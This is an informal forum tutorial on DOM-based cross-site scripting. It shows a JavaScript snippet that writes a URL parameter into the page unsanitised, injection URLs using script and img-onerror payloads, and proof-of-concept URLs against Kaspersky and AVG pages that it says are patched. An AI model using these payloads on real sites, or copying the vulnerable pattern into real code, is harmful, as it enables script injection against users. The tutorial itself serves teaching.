[Tutorial] DOM Based XSS Vulnerability

Asalam Alykum Friends.
Title: DOM Based XSS
Author: Darksnipper.

What is Dom?
DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage.
Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.


Example:

PHP Code:

< html>
 < head>
< /head>
< body>  
  
var pos=document.URL.indexOf(" madleetop =")+9;   //finds the position of value  
var userInput=document.URL.substring(pos,document.URL.length);  //copy the value into userInput variable 
document.write(unescape(userInput));  //writes content to the webpage   < / body>< / html> 




i use spaces coz site is filterng my cntent nd remvng html tags.


In the above example, the javascript code getsvalue from the url parameter "madleetop" and writes the value in our webpage.

For Example If the Url is

Code:

www.madleets.com/snipper?madleetop=me

the webpage will display "me"

Did you notice ?! The part of the webpage is not written by Server-side script. The client side script modifies the content dynamically based on the input. Everything done with the help of DOM object 'document'.
Hope you understand.

DOM Based XSS vulnerability:
When a web developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code.
In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url.
An attacker with malicious intention can inject a xss vector instead .
For example:

Code:

www.madleets.com/snipper?madleetop=alert("Juno_okyo")</script>




the document.write function simply writes the value of madleetop parameter in the webpage. So it will write the 'alert("immad")< /script>' in the webpage without sanitizing. This results in running the script code and displays the alert box.

More Information
we can inject other sites like
http://www.site.com/me.aspx
A user could inject code for example:

< img src=f00bar onerror=prompt(" xss");> ...on the input text in the form nd click oN"Search" button

example no 2
kaspersky was also vulnerable to it
let me explain how attacker did:
The problem was located on a bad validation of location.hash coming from jQuery (which is alsooutdated)

PHP Code:

/*load current tab by url*/

//if($.url.param("tab"))
$('a[name='+$.url.param("tab")+']').trigger('click');

var hash = location.hash;

if (hash.indexOf("tab=") != -1) {

hash = hash.replace(/^#tab=/, "");

$('a[name=' + hash + ']').trigger('click');

} 




If a user loads the "tab" parameter on the URL it will execute the code.
Proof of concept:

Code:

http://www.kaspersky.com/tablet-security#tab=<img src=x onerror=prompt( "XSS - Juno_okyo");>




Note:it has been patched
i used jus to make easy to explain.

Example no 3.
Avg was also Vulnerable to it,but they patched it.

Poc:
Due to the lack of escaping/encoding the URL onthe code present on file js_stdfull.js, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)

var pathname = $(location).attr('href');var urlparts = pathname.split("#");

Proof of concept:

Code:

http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/XSS/);




Thanks.

Follow: http://www.madleets.com/